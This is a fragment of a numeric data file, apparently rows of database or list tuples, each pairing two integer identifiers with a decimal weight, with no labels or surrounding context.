(235, 267558, 1.05),
(235, 267559, 1.16669),
(235, 267560, 0.98),
(235, 267561, 1.09669),
(235, 267562, 1.05),
(235, 267563, 1.14331),
(235, 267564, 0.42),
(235, 267565, 1.09669),
(235, 267566, 1.14331),
(235, 267567, 1.00331),
(235, 267568, 0.93331),
(235, 267569, 1.00331),
(235, 267570, 0.93331),
(235, 267571, 1.12),
(235, 267572, 0.18669),
(290, 267572, 0.18669),
(235, 267573, 0.88669),
(290, 267573, 0.88669),
(235, 267574, 1.19),
(235, 267600, 0.88669),
(235, 267601, 0.95669),
(235, 267602, 0.93331),
(235, 267603, 0.95669),
(235, 267604, 1.02669),
(235, 267605, 0.95669),
(235, 267606, 0.88669),
(235, 267607, 1.09669),
(235, 267608, 0.98),
(292, 267608, 0.98),
(235, 267609, 1.09669),
(235, 267610, 1.14331),
(235, 267611, 2.05338),
(235, 267612, 1.09669),
(235, 267613, 1.02669),
(235, 267614, 0.91),
(235, 267615, 1.07331),
(235, 267616, 1.00331),
(235, 267617, 0.91),
(235, 267618, 1.00331),
(235, 267619, 1.07331),
(235, 267620, 1.00331),
(235, 267621, 1.02669),
(235, 267622, 1.07331),
(235, 267623, 1.00331),
(235, 267721, 0.81669),
(235, 267722, 0.91),
(235, 267723, 1.14331),
(235, 267724, 0.95669),
(235, 267725, 0.95669),
(235, 267726, 1.00331),
(235, 267727, 1.00331),
(235, 267728, 0.95669),
(235, 267729, 1.07331),
(235, 267730, 0.84),
(235, 267731, 0.91),
(235, 267732, 0.86331),
(235, 267733, 0.91),
(235, 267734, 1.12),
(235, 267735, 1.00331),
(235, 267736, 0.88669),
(235, 267737, 0.51331),
(235, 267738, 1.07331),
(235, 267739, 1.16669),
(235, 267740, 0.51331),
(235, 267741, 1.02669),
(235, 267742, 1.14331),
(235, 267743, 0.86331),
(235, 267744, 0.95669),
(235, 267745, 1.02669),
(235, 267746, 0.95669),
(235, 267747, 1.00331),
(235, 267748, 0.93331),
(235, 267749, 1.05),
(235, 267750, 2.05338),
(235, 267751, 0.98),
(235, 267752, 0.91),
(235, 267753, 0.98),
(235, 267754, 0.93331),
(235, 267755, 0.91),
(235, 267756, 1.00331),
(235, 267757, 1.02669),
(235, 267758, 1.09669),
(235, 267759, 0.86331),
(235, 267760, 1.02669),
(235, 267761, 0.91),
(235, 267762, 1.00331),
(235, 267763, 0.91),
(235, 267764, 0.98),
(235, 267765, 0.93331),
(235, 267766, 1.14331),
(235, 267767, 1.05),
(235, 267768, 1.00331),
(235, 267769, 0.88669),
(235, 267770, 1.07331),
(235, 267771, 1.05),
(235, 267772, 1.09669),
(235, 267773, 1.00331),
(235, 267774, 0.86331),
(235, 267775, 0.95669),
(235, 267776, 2.4666),
(235, 267777, 2.7334),
(235, 267788, 2.6666),
(235, 267789, 1.05),
(235, 267904, 1.09669),
(235, 267905, 0.91),
(235, 267906, 1.00331),
(235, 267907, 0.88669),
(235, 267908, 1.16669),
(235, 267909, 1.00331),
(235, 267910, 1.12),
(235, 267911, 0.93331),
(235, 267912, 1.00331),
(235, 267913, 1.02669),
(235, 267914, 1.09669),
(235, 267915, 0.95669),
(235, 267916, 1.19),
(235, 267917, 0.37331),
(235, 267918, 1.07331),
(235, 267919, 1.19),
(235, 267920, 0.56),
(235, 267921, 1.86662),
(235, 267922, 2.28662),
(236, 268499, 0.21),
(236, 268500, 0.81669),
(236, 268501, 0.93331),
(236, 268672, 0.86331),
(236, 268673, 1.02669),
(236, 268674, 0.93331),
(236, 268675, 1.02669),
(236, 268676, 1.02669),
(236, 268677, 1.09669),
(236, 268678, 1.05),
(236, 268679, 1.14331),
(236, 268680, 1.09669),
(236, 268681, 1.23669),
(236, 268682, 0.32669),
(236, 268683, 0.95669),
(236, 268684, 1.09669),
(236, 268685, 1.12),
(236, 268686, 1.26),
(236, 268687, 0.37331),
(236, 268688, 0.98),
(236, 268689, 1.07331),
(236, 268690, 0.42),
(236, 268691, 0.98),
(236, 268692, 1.12),
(236, 268693, 1.07331),
(236, 268694, 0.28),
(236, 268695, 1.02669),
(236, 268696, 1.14331),
(236, 268697, 0.32669),
(236, 268698, 0.98),
(236, 268699, 1.07331),
(236, 268700, 1.09669),
(236, 268701, 1.21331),
(236, 268702, 1.23669),
(236, 268703, 0.81669),
(236, 268704, 0.91),
(236, 268705, 2.05338),
(236, 268706, 1.23669),
(236, 268707, 1.21331),
(236, 268708, 1.05),
(236, 268709, 1.14331),
(236, 268751, 0.65338),
(236, 268752, 0.93331),
(236, 268753, 0.98),
(236, 268754, 0.98),
(236, 268755, 1.07331),
(236, 268756, 1.00331),
(236, 268757, 1.07331),
(236, 268758, 0.32669),
(236, 268759, 0.93331),
(236, 268760, 1.05),
(236, 268761, 0.98),
(236, 268762, 1.16669),
(236, 268763, 0.91),
(236, 268764, 1.02669),
(236, 268765, 0.93331),
(236, 268766, 1.02669),
(236, 268767, 1.05),
(236, 268768, 1.09669),
(236, 268769, 1.14331),
(236, 268770, 1.02669),
(236, 268771, 2.32339),
(236, 268772, 1.02669),
(236, 268773, 0.32669),
(236, 268774, 0.95669),
(236, 268775, 1.00331),
(236, 268776, 1.09669),
(236, 268777, 0.98),
(236, 268778, 0.93331),
(236, 268779, 1.05),
(236, 268780, 1.05),
(236, 268781, 0.95669),
(236, 268855, 0.81669),
(292, 268855, 0.81669),
(306, 268855, 0.81669),
(236, 268856, 0.88669),
(236, 268857, 0.93331),
(236, 268858, 0.37331),
(305, 268858, 0.37331),
(236, 268859, 0.98),
(236, 268860, 1.12),
(236, 268861, 1.12),
(236, 268862, 0.93331),
(236, 268863, 1.07331),
(236, 268864, 1.00331),
(236, 268865, 1.02669),
(236, 268866, 1.86662),
(236, 268867, 1.00331),
(236, 268868, 1.07331),
(236, 268869, 1.02669),
(236, 268870, 0.32669),
(236, 268871, 0.95669),
(236, 268872, 1.14331),
(236, 268873, 0.46669),
(236, 268874, 1.09669),
(236, 268875, 1.37669),
(236, 268876, 0.42),
(236, 268877, 0.98),
(236, 268878, 1.16669),
(236, 268879, 0.46669),
(236, 268880, 1.00331),
(236, 268881, 1.07331),
(236, 268882, 0.51331),
(236, 268883, 1.14331),
(236, 268884, 1.37669),
(236, 268885, 1.00331),
(236, 268886, 0.95669),
(236, 268887, 0.95669),
(305, 268887, 0.95669),
(236, 268888, 1.05),
(236, 268889, 0.98),
(236, 268890, 1.16669),
(236, 268891, 0.93331),
(236, 268892, 1.02669),
(236, 268893, 1.02669),
(236, 268894, 1.02669),
(236, 268895, 0.98),
(236, 268896, 1.12),
(236, 268897, 1.02669),
(236, 268898, 1.05),
(236, 268899, 0.93331),
(236, 268900, 0.91),
(236, 268901, 2.4666),
(236, 268902, 3),
(236, 268911, 2.6666),
(236, 268912, 1.09669),
(236, 268913, 0.86331),
(236, 268914, 0.93331),
(236, 269022, 0.95669),
(236, 269023, 1.14331),
(236, 269024, 1.86662),
(236, 269025, 1.19),
(236, 269026, 1.02669),
(236, 269027, 0.32669),
(236, 269028, 0.98),
(236, 269029, 1.07331),
(236, 269030, 1.00331),
(236, 269031, 1.23669),
(236, 269032, 0.91),
(236, 269033, 1.07331),
(236, 269034, 1.00331),
(236, 269035, 1.05),
(236, 269036, 1.00331),
(236, 269037, 1.14331),
(236, 269038, 2.83339),
(236, 269039, 0.42),
(236, 269040, 1.09669),
(236, 269041, 1.16669),
(236, 269042, 0.32669),
(236, 269043, 0.93331),
(236, 269044, 1.09669),
(236, 269045, 0.86331),
(236, 269046, 0.93331),
(237, 269560, 0.88669),
(237, 269561, 1.00331),
(237, 269562, 0.46669),
(237, 269563, 1.12),
(237, 269564, 1.26),
(237, 269565, 0.28),
(304, 269565, 0.28),
(237, 269566, 0.88669),
(237, 269567, 1.05),
(237, 269568, 1.05),
(237, 269583, 1.14331),
(237, 269584, 2.66339),
(237, 269585, 0.46669),
(237, 269586, 1.12),
(237, 269587, 1.23669),
(237, 269588, 0.91),
(237, 269589, 1.02669),
(237, 269590, 1.19),
(237, 269591, 0.88669),
(237, 269592, 1.07331),
(237, 269593, 1.05),
(237, 269594, 1.12),
(237, 269595, 0.98),
(237, 269596, 1.05),
(237, 269597, 0.95669),
(237, 269598, 1.12),
(237, 269599, 0.93331),
(292, 269599, 0.93331),
(237, 269600, 1.07331),
(237, 269637, 0.98),
(237, 269638, 0.98),
(237, 269639, 0.98),
(237, 269640, 1.77338),
(237, 269641, 0.98),
(237, 269642, 0.95669),
(237, 269643, 1.00331),
(292, 269643, 1.00331),
(305, 269643, 1.00331),
(237, 269644, 1.21331),
(237, 269645, 0.95669),
(237, 269646, 1.05),
(237, 269647, 1.00331),
(237, 269648, 2.00662),
(237, 269649, 0.95669),
(237, 269650, 1.09669),
(237, 269651, 0.91),
(237, 269652, 1.02669),
(237, 269653, 1.05),
(237, 269654, 0.91),
(237, 269655, 1.02669),
(237, 269656, 1.09669),
(237, 269657, 1.07331),
(237, 269658, 1.05),
(237, 269659, 0.98),
(237, 269660, 0.93331),
(237, 269661, 0.93331),
(237, 269662, 1.00331),
(237, 269663, 0.93331),
(237, 269664, 1.09669),
(237, 269665, 0.91),
(237, 269666, 1.02669),
(237, 269667, 0.88669),
(237, 269668, 0.98),
(237, 269669, 0.84),
(306, 269669, 0.84),
(237, 269670, 1.14331),
(237, 269671, 1.00331),
(237, 269672, 1.07331),
(237, 269673, 1.02669),
(237, 269674, 1.14331),
(237, 269675, 0.98),
(237, 269676, 1.09669),
(237, 269677, 2.4666),
(237, 269678, 2.9334),
(237, 269679, 0.28),
(237, 269680, 1.00331),
(237, 269681, 1.09669),
(237, 269683, 2.6666),
(237, 269684, 0.32669),
(237, 269685, 0.95669),
(237, 269686, 1.02669),
(237, 269738, 1.02669),
(237, 269739, 1.09669),
(237, 269740, 1.09669),
(237, 269741, 1.28331),
(237, 269742, 1.05),
(237, 269743, 0.88669),
(237, 269744, 0.98),
(237, 269745, 0.28),
(237, 269746, 0.93331),
(237, 269747, 1.05),
(237, 269748, 1.07331),
(237, 269749, 1.19),
(237, 269750, 0.93331),
(237, 269751, 1.00331),
(237, 269752, 0.37331),
(237, 269753, 0.95669),
(237, 269754, 1.07331),
(237, 269755, 0.91),
(237, 269756, 1.07331),
(238, 270769, 0.91),
(238, 270770, 1.02669),
(238, 270771, 1.00331),
(238, 270772, 0.95669),
(238, 270773, 0.88669),
(238, 270774, 0.95669),
(238, 270775, 1.00331),
(238, 270776, 0.93331),
(238, 270777, 1.09669),
(238, 270778, 0.88669),
(238, 270779, 0.98),
(238, 270780, 1.05),
(238, 270781, 1.09669),
(238, 270782, 1.16669),
(238, 270783, 0.95669),
(238, 270784, 0.14),
(238, 270785, 0.86331),
(238, 270786, 1.00331),
(238, 270787, 1.02669),
(238, 270788, 1.23669),
(238, 270789, 0.37331),
(238, 270790, 1.02669),
(238, 270791, 1.21331),
(238, 270792, 1.23669),
(238, 270793, 1.02669),
(238, 270794, 1.26),
(238, 270795, 1.14331),
(238, 270796, 0.91),
(238, 270797, 1.14331),
(238, 270798, 1.00331),
(238, 270799, 1.21331),
(238, 270800, 1.00331),
(238, 270801, 1.07331),
(238, 270802, 1.09669),
(238, 270803, 0.98),
(238, 270804, 0.28),
(238, 270805, 0.93331),
(238, 270806, 1.02669),
(238, 270807, 0.86331),
(238, 270808, 1.00331),
(238, 270835, 1.02662),
(238, 270836, 1.05),
(238, 270837, 1.16669),
(238, 270838, 1.14331),
(238, 270839, 1.21331),
(238, 270840, 2.14662),
(238, 270841, 1.16669),
(238, 270842, 1.35331),
(238, 270843, 1.05),
(238, 270844, 1.19),
(238, 270845, 0.84),
(238, 270846, 0.95669),
(238, 270847, 1.00331),
(238, 270848, 1.12),
(238, 270849, 0.95669),
(238, 270850, 1.05),
(238, 270851, 0.93331),
(238, 270852, 1.02669),
(238, 270853, 0.95669),
(238, 270854, 1.02669),
(238, 270855, 1.05),
(238, 270856, 1.14331),
(238, 270857, 1.05),
(238, 270858, 1.16669),
(238, 270859, 2.05338),
(238, 270860, 1.07331),
(238, 270861, 1.21331),
(238, 270862, 0.86331),
(238, 270863, 0.93331),
(238, 270864, 0.88669),
(238, 270865, 1.00331),
(238, 270866, 1.12),
(238, 270867, 0.91),
(238, 270868, 0.95669),
(238, 270869, 0.42),
(238, 270870, 0.98),
(238, 270871, 1.23669),
(238, 270872, 1.07331),
(238, 270873, 1.21331),
(238, 270874, 0.86331),
(238, 270875, 1.02669),
(238, 270876, 1.05),
(238, 270877, 1.19),
(238, 270878, 0.98),
(238, 270879, 0.95669),
(238, 270880, 1.02669),
(238, 270881, 0.88669),
(238, 270882, 0.93331),
(238, 270883, 0.95669),
(238, 270884, 1.05),
(238, 270885, 0.95669),
(238, 270886, 1.05),
(238, 270887, 0.88669),
(238, 270888, 1.07331),
(238, 270889, 0.98),
(238, 270890, 0.98),
(238, 270891, 1.12),
(238, 270892, 0.98),
(238, 270893, 0.42),
(238, 270894, 0.98),
(238, 270895, 1.07331),
(238, 270896, 0.91),
(238, 270897, 1.05),
(238, 270898, 0.95669),
(238, 270899, 1.00331),
(238, 270900, 0.98),
(238, 270901, 1.09669),
(238, 270902, 1.05),
(238, 270903, 0.28),
(238, 270904, 0.91),
(238, 270905, 0.98),
(238, 270906, 0.88669),
(238, 270907, 1.02669),
(238, 270908, 1.14331),
(238, 270909, 1.12),
(238, 270910, 1.19),
(238, 270911, 1.12),
(238, 270912, 1.21331),
(238, 270913, 1.00331),
(238, 270914, 0.88669),
(238, 270915, 1.00331),
(238, 270916, 0.93331),
(238, 270917, 1.05),
(238, 270918, 0.88669),
(238, 270919, 1.02669),
(238, 270920, 1.09669),
(238, 270921, 1.30669),
(238, 270922, 0.56),
(238, 270923, 0.91),
(238, 270924, 1.02669),
(238, 270925, 0.91),
(238, 270926, 1.02669),
(238, 270927, 1.12),
(238, 270928, 1.05),
(238, 270929, 1.02669),
(238, 270930, 1.14331),
(238, 271015, 0.95669),
(238, 271016, 0.86331),
(238, 271017, 0.91),
(238, 271018, 1.05),
(238, 271019, 1.00331),
(238, 271020, 0.86331),
(238, 271021, 0.95669),
(238, 271022, 0.95669),
(238, 271023, 1.05),
(238, 271024, 0.95669),
(238, 271025, 1.07331),
(238, 271026, 1.05),
(238, 271027, 1.21331),
(238, 271028, 0.56),
(238, 271029, 1.07331),
(238, 271030, 1.21331),
(238, 271031, 1.07331),
(238, 271032, 1.37669),
(238, 271033, 0.98),
(238, 271034, 1.07331),
(238, 271035, 0.91),
(238, 271036, 0.95669),
(238, 271037, 1.02669),
(238, 271038, 1.00331),
(238, 271039, 1.21331),
(238, 271040, 0.91),
(238, 271041, 1.02669),
(238, 271042, 0.95669),
(238, 271043, 1.05),
(238, 271044, 1.00331),
(238, 271045, 1.09669),
(238, 271046, 0.98),
(238, 271047, 1.07331),
(238, 271048, 0.98),
(238, 271049, 1.05),
(238, 271050, 1.07331),
(238, 271051, 1.16669),
(238, 271052, 0.98),
(238, 271053, 1.00331),
(238, 271054, 0.95669),
(238, 271055, 1.02669),
(238, 271056, 1.00331),
(238, 271057, 1.16669),
(238, 271058, 1.02669),
(238, 271059, 1.05),
(238, 271060, 0.98),
(238, 271061, 0.86331),
(238, 271062, 1.05),
(238, 271063, 0.88669),
(304, 271063, 0.88669),
(238, 271064, 1.05),
(238, 271065, 1.07331),
(238, 271066, 2.4666),
(238, 271067, 3.0666),
(238, 271068, 0.81669),
(238, 271069, 1.00331),
(238, 271070, 0.98),
(238, 271071, 1.02669),
(238, 271086, 2.6666),
(238, 271087, 0.91),
(238, 271088, 1.02669),
(238, 271089, 0.86331),
(238, 271090, 0.93331),
(238, 271091, 0.86331),
(238, 271092, 1.00331),
(238, 271093, 0.95669),
(238, 271094, 1.09669),
(238, 271095, 0.98),
(238, 271096, 1.30669),
(238, 271097, 0.93331),
(288, 271097, 0.93331),
(238, 271098, 1.05),
(238, 271236, 0.32669),
(238, 271237, 0.98),
(238, 271238, 1.07331),
(238, 271239, 1.05),
(238, 271240, 1.02669),
(238, 271241, 1.09669),
(238, 271242, 1.16669),
(238, 271243, 1.05),
(238, 271244, 0.42),
(238, 271245, 1.00331),
(238, 271246, 1.23669),
(238, 271247, 1.02669),
(238, 271248, 1.09669),
(238, 271249, 0.46669),
(238, 271250, 1.12),
(238, 271251, 1.19),
(238, 271252, 0.86331),
(238, 271253, 0.98),
(238, 271254, 0.98),
(238, 271255, 1.02669),
(238, 271256, 0.93331),
(238, 271257, 1.02669),
(238, 271258, 0.42),
(305, 271258, 0.42),
(238, 271259, 1.05),
(238, 271260, 1.12),
(238, 271261, 1.00331),
(238, 271262, 1.07331),
(238, 271263, 0.42),
(238, 271264, 1.09669),
(238, 271265, 1.19),
(238, 271266, 0.95669),
(238, 271267, 1.00331),
(238, 271268, 0.23331),
(238, 271269, 0.88669),
(238, 271270, 1.07331),
(238, 271271, 0.98),
(238, 271272, 1.07331),
(239, 272804, 1.02669),
(239, 272805, 1.02669),
(239, 272806, 1.21331),
(239, 272807, 0.28),
(239, 272808, 0.98),
(239, 272809, 1.05),
(239, 272810, 0.32669),
(239, 272811, 0.95669),
(239, 272812, 1.14331),
(239, 272813, 1.05),
(239, 272814, 1.19),
(239, 272815, 0.23331),
(239, 272816, 1.05),
(239, 272817, 1.21331),
(239, 272818, 1.05),
(239, 272819, 1.21331),
(239, 272820, 1.07331),
(239, 272821, 1.16669),
(239, 272822, 1.09669),
(239, 272823, 0.91),
(239, 272824, 0.98),
(239, 272825, 0.93331),
(239, 272826, 1.05),
(239, 272827, 0.93331),
(239, 272828, 1.05),
(239, 272829, 0.56),
(239, 272830, 0.88669),
(239, 272831, 1.16669),
(239, 272832, 0.95669),
(239, 272833, 1.12),
(239, 272834, 1.00331),
(239, 272835, 1.07331),
(239, 272836, 1.14331),
(239, 272837, 1.21331),
(239, 272838, 0.37331),
(239, 272839, 0.98),
(239, 272840, 1.23669),
(239, 272841, 0.84),
(239, 272842, 0.98),
(239, 272843, 0.81669),
(306, 272843, 0.81669),
(239, 272844, 0.88669),
(239, 272845, 1.02669),
(239, 272846, 1.14331),
(239, 272847, 2.14662),
(239, 272848, 0.98),
(239, 272849, 1.12),
(239, 272850, 2.00662),
(239, 272851, 1.07331),
(239, 272852, 1.07331),
(239, 272853, 1.09669),
(239, 272854, 0.37331),
(239, 272855, 0.98),
(239, 272856, 1.12),
(239, 272857, 1.05),
(239, 272858, 0.98),
(239, 272859, 1.05),
(239, 272860, 0.91),
(239, 272861, 1.07331),
(239, 272862, 0.91),
(239, 272863, 1.00331),
(239, 272864, 0.93331),
(239, 272865, 1.23669),
(239, 272866, 0.18669),
(306, 272866, 0.18669),
(239, 272867, 0.86331),
(239, 272868, 0.91),
(239, 272907, 1.02669),
(239, 272908, 1.33),
(239, 272909, 0.88669),
(239, 272910, 0.95669),
(239, 272911, 0.93331),
(239, 272912, 1.12),
(239, 272913, 1.16669),
(239, 272914, 1.14331),
(239, 272915, 0.98),
(239, 272916, 1.09669),
(239, 272917, 0.88669),
(306, 272917, 1.77338),
(239, 272918, 0.95669),
(239, 272919, 0.18669),
(239, 272920, 0.88669),
(239, 272921, 1.05),
(239, 272922, 0.91),
(239, 272923, 1.09669),
(239, 272924, 1.07331),
(239, 272925, 0.18669),
(239, 272926, 0.93331),
(239, 272927, 1.00331),
(239, 272928, 0.93331),
(239, 272929, 1.00331),
(239, 272930, 0.98),
(239, 272931, 1.05),
(239, 272932, 0.95669),
(239, 272933, 1.09669),
(239, 272934, 0.32669),
(239, 272935, 0.93331),
(239, 272936, 1.14331),
(239, 272937, 0.98),
(239, 272938, 1.28331),
(239, 272939, 1.00331),
(239, 272940, 1.12),
(239, 272941, 0.93331),
(239, 272942, 1.09669),
(239, 272943, 1.00331),
(239, 272944, 1.09669),
(239, 272945, 1.21331),
(239, 272946, 1.02669),
(239, 272947, 1.07331),
(239, 272948, 1.07331),
(239, 273048, 1.05),
(239, 273049, 0.93331),
(239, 273050, 0.86331),
(239, 273051, 0.98),
(239, 273052, 0.95669),
(239, 273053, 1.14331),
(239, 273054, 0.37331),
(239, 273055, 1.05),
(239, 273056, 1.14331),
(239, 273057, 0.95669),
(239, 273058, 0.98),
(239, 273059, 1.07331),
(239, 273060, 0.28),
(305, 273060, 0.56),
(239, 273061, 0.93331),
(239, 273062, 1.05),
(239, 273063, 1.09669),
(306, 273063, 1.09669),
(239, 273064, 1.16669),
(239, 273065, 0.81669),
(306, 273065, 0.81669),
(239, 273066, 1.00331),
(239, 273067, 0.98),
(239, 273068, 1.02669),
(239, 273069, 0.95669),
(239, 273070, 0.86331),
(239, 273071, 1.05),
(239, 273072, 0.91),
(239, 273073, 1.09669),
(239, 273074, 0.98),
(239, 273075, 1.16669),
(239, 273076, 0.98),
(239, 273077, 0.81669),
(239, 273078, 0.93331),
(239, 273079, 1.00331),
(239, 273080, 0.98),
(239, 273081, 1.02669),
(239, 273082, 1.00331),
(239, 273083, 1.05),
(239, 273084, 0.95669),
(239, 273085, 1.02669),
(239, 273086, 2.00662),
(239, 273087, 1.02669),
(239, 273088, 1.12),
(239, 273089, 1.05),
(239, 273090, 1.16669),
(239, 273091, 0.56),
(239, 273092, 1.19),
(239, 273093, 1.4),
(239, 273094, 0.51331),
(305, 273094, 0.51331),
(239, 273095, 0.60669),
(239, 273096, 1.16669),
(239, 273097, 1.26),
(239, 273098, 0.93331),
(239, 273099, 0.95669),
(239, 273100, 1.05),
(239, 273101, 0.93331),
(239, 273102, 1.09669),
(239, 273103, 0.81669),
(304, 273103, 0.81669),
(239, 273104, 0.86331),
(239, 273105, 0.93331),
(239, 273106, 1.00331),
(239, 273107, 1.21331),
(239, 273108, 1.16669),
(239, 273109, 0.95669),
(239, 273110, 0.98),
(239, 273111, 1.00331),
(239, 273112, 0.95669),
(306, 273112, 0.95669),
(239, 273113, 0.98),
(239, 273114, 1.00331),
(239, 273115, 1.23669),
(239, 273116, 0.95669),
(239, 273117, 1.21331),
(239, 273118, 1.05),
(239, 273119, 0.91),
(239, 273120, 1.00331),
(239, 273121, 0.86331),
(239, 273122, 0.98),
(239, 273123, 0.88669),
(239, 273124, 0.98),
(239, 273125, 0.95669),
(239, 273126, 1.12),
(239, 273127, 1.02669),
(239, 273128, 0.86331),
(239, 273129, 0.95669),
(239, 273130, 0.98),
(239, 273131, 1.02669),
(239, 273132, 1.14331),
(239, 273133, 2.4666),
(239, 273134, 3),
(239, 273142, 2.6666),
(239, 273143, 0.88669),
(239, 273144, 1.02669),
(239, 273145, 1.14331),
(239, 273146, 0.88669),
(239, 273147, 1.02669),
(239, 273148, 1.00331),
(239, 273149, 0.95669),
(239, 273150, 1.02669),
(239, 273151, 0.98),
(239, 273152, 1.23669),
(239, 273333, 2.04),
(239, 273334, 2.43661),
(239, 273335, 0.98),
(239, 273336, 1.09669),
(239, 273337, 0.95669),
(239, 273338, 1.09669),
(239, 273339, 1.00331),
(239, 273340, 1.05),
(239, 273341, 1.05),
(239, 273342, 1.14331),
(239, 273343, 1.09669),
(239, 273344, 0.91),
(239, 273345, 1.07331),
(239, 273346, 0.32669),
(239, 273347, 0.98),
(239, 273348, 1.07331),
(239, 273349, 0.93331),
(239, 273350, 1.07331),
(239, 273351, 1.02669),
(239, 273352, 0.56),
(239, 273353, 1.05),
(239, 273354, 1.16669),
(239, 273355, 1.21331),
(239, 273356, 0.95669),
(239, 273357, 1.02669),
(239, 273358, 0.91),
(239, 273359, 1.02669),
(239, 273360, 1.26),
(239, 273361, 0.91),
(239, 273362, 1.02669),
(239, 273363, 0.95669),
(239, 273364, 1.07331),
(239, 273365, 1.07331),
(239, 273366, 1.16669),
(239, 273367, 1.00331),
(239, 273368, 1.09669),
(239, 273369, 0.98),
(239, 273370, 1.07331),
(239, 273371, 0.37331),
(290, 273371, 0.37331),
(239, 273372, 0.95669),
(239, 273373, 1.14331),
(239, 273374, 0.91),
(239, 273375, 1.09669),
(239, 273376, 1.05),
(239, 273377, 1.23669),
(239, 273378, 1.12),
(239, 273379, 1.21331),
(239, 273380, 1.05),
(239, 273381, 1.26),
(239, 273382, 1.02669),
(239, 273383, 1.14331),
(239, 273384, 0.28),
(288, 273384, 0.28),
(239, 273385, 0.98),
(239, 273386, 1.14331),
(239, 273387, 1.02669),
(239, 273388, 1.23669),
(239, 273389, 0.18669),
(239, 273390, 0.86331),
(239, 273391, 0.95669),
(239, 273392, 0.93331),
(239, 273393, 0.88669),
(239, 273394, 0.95669),
(240, 274553, 0.84),
(240, 274554, 1.00331),
(240, 274897, 1.07331),
(240, 274898, 1.21331),
(240, 274899, 0.84),
(240, 274900, 1.02669),
(240, 274901, 0.95669),
(240, 274902, 1.09669),
(240, 274903, 1.21331),
(240, 274904, 0.93331),
(240, 274905, 1.05),
(240, 274906, 0.23331),
(240, 274907, 0.91),
(240, 274908, 1.19),
(240, 274909, 0.56),
(240, 274910, 1.05),
(240, 274911, 1.16669),
(240, 274912, 0.93331),
(240, 274913, 1.02669),
(240, 274914, 1.00331),
(240, 274915, 1.14331),
(240, 274916, 0.95669),
(240, 274917, 1.09669),
(240, 274918, 0.95669),
(240, 274919, 1.14331),
(240, 274920, 1.28331),
(240, 274921, 0.51331),
(288, 274921, 0.51331),
(240, 274922, 1.14331),
(240, 274923, 1.33),
(240, 274924, 0.91),
(240, 274925, 1.00331),
(240, 274926, 0.95669),
(240, 274927, 1.05),
(240, 274928, 0.95669),
(288, 274928, 0.95669),
(240, 274929, 0.88669),
(240, 274930, 1.07331),
(240, 274931, 1.26),
(240, 274932, 1.09669),
(240, 274933, 0.95669),
(240, 274934, 1.05),
(240, 274935, 1.02669),
(240, 274936, 1.09669),
(240, 274937, 1.21331),
(240, 274938, 1.07331),
(240, 274939, 1.23669),
(240, 274940, 0.81669),
(240, 274941, 0.86331),
(240, 274942, 0.95669),
(240, 274943, 0.98),
(304, 274943, 0.98),
(240, 274944, 0.86331),
(240, 274945, 0.98),
(240, 274946, 1.00331),
(240, 274947, 1.02669),
(240, 274948, 1.09669),
(240, 274949, 1.14331),
(240, 274950, 1.26),
(240, 274951, 0.98),
(240, 274952, 1.05),
(240, 274953, 0.93331),
(240, 274954, 1.07331),
(240, 274955, 1.05),
(240, 274956, 0.93331),
(305, 274956, 0.93331),
(306, 274956, 0.93331),
(240, 274957, 0.98),
(240, 274958, 0.91),
(240, 274959, 1.02669),
(240, 274960, 0.95669),
(240, 274961, 1.16669),
(240, 274962, 0.32669),
(306, 274962, 0.32669),
(240, 274963, 0.93331),
(240, 274964, 1.05),
(240, 274965, 0.69993),
(240, 274966, 0.86331),
(240, 274967, 0.95669),
(240, 274968, 0.91),
(240, 274969, 1.00331),
(240, 274970, 0.95669),
(240, 274971, 1.05),
(240, 274972, 0.32669),
(240, 274973, 1.02669),
(240, 274974, 1.16669),
(240, 274975, 0.91),
(240, 274976, 1.02669),
(240, 275030, 1.91338),
(240, 275031, 1.05),
(240, 275032, 1.00331),
(240, 275033, 1.14331),
(240, 275034, 0.91),
(240, 275035, 0.98),
(240, 275036, 1.07331),
(240, 275037, 1.16669),
(240, 275038, 1.00331),
(240, 275039, 1.07331),
(240, 275040, 0.98),
(240, 275041, 0.93331),
(240, 275042, 1.14331),
(240, 275043, 1.07331),
(240, 275044, 1.00331),
(240, 275045, 1.05),
(240, 275046, 1.14331),
(240, 275047, 0.95669),
(240, 275048, 1.14331),
(240, 275049, 1.00331),
(240, 275050, 1.02669),
(240, 275051, 1.14331),
(240, 275052, 0.84),
(240, 275053, 0.91),
(240, 275054, 1.05),
(240, 275055, 1.14331),
(240, 275056, 1.09669),
(240, 275057, 1.26),
(240, 275058, 1.05),
(240, 275059, 1.12),
(240, 275060, 1.07331),
(240, 275061, 1.09669),
(240, 275062, 1.28331),
(240, 275063, 0.56),
(240, 275064, 1.05),
(240, 275065, 1.14331),
(240, 275066, 1.21331),
(240, 275067, 0.88669),
(240, 275068, 0.98),
(240, 275069, 1.86662),
(240, 275070, 1.02669),
(240, 275071, 1.09669),
(240, 275072, 1.07331),
(240, 275073, 1.02669),
(240, 275074, 1.19),
(240, 275075, 1.07331),
(240, 275076, 0.95669),
(240, 275077, 0.91),
(240, 275078, 0.95669),
(240, 275079, 1.05),
(240, 275080, 1.07331),
(240, 275081, 1.00331),
(240, 275082, 1.14331),
(240, 275083, 0.98),
(240, 275084, 1.12),
(240, 275085, 0.88669),
(290, 275085, 0.88669),
(240, 275086, 1.14331),
(240, 275087, 1.02669),
(240, 275088, 0.98),
(240, 275089, 1.14331),
(240, 275090, 0.32669),
(240, 275091, 0.93331),
(240, 275092, 1.12),
(240, 275093, 0.95669),
(240, 275094, 1.05),
(240, 275095, 1.00331),
(240, 275096, 1.07331),
(240, 275185, 0.95669),
(305, 275185, 0.95669),
(240, 275186, 0.32669),
(240, 275187, 0.95669),
(240, 275188, 1.07331),
(240, 275189, 1.09669),
(240, 275190, 1.00331),
(240, 275191, 0.95669),
(240, 275192, 0.88669),
(240, 275193, 1.00331),
(240, 275194, 0.98),
(240, 275195, 1.02669),
(240, 275196, 1.12),
(305, 275196, 1.12),
(240, 275197, 0.98),
(240, 275198, 0.95669),
(240, 275199, 0.86331),
(240, 275200, 0.93331),
(240, 275201, 0.93331),
(240, 275202, 1.05),
(240, 275203, 1.14331),
(240, 275204, 1.12),
(240, 275205, 1.14331),
(240, 275206, 0.93331),
(240, 275207, 1.00331),
(240, 275208, 0.95669),
(240, 275209, 1.02669),
(240, 275210, 0.95669),
(240, 275211, 2.1),
(240, 275212, 1.00331),
(240, 275213, 1.02669),
(240, 275214, 1.02669),
(240, 275215, 1.00331),
(240, 275216, 1.09669),
(240, 275217, 1.05),
(240, 275218, 1.12),
(240, 275219, 2.1),
(240, 275220, 2.75338),
(240, 275221, 0.42),
(240, 275222, 1.00331),
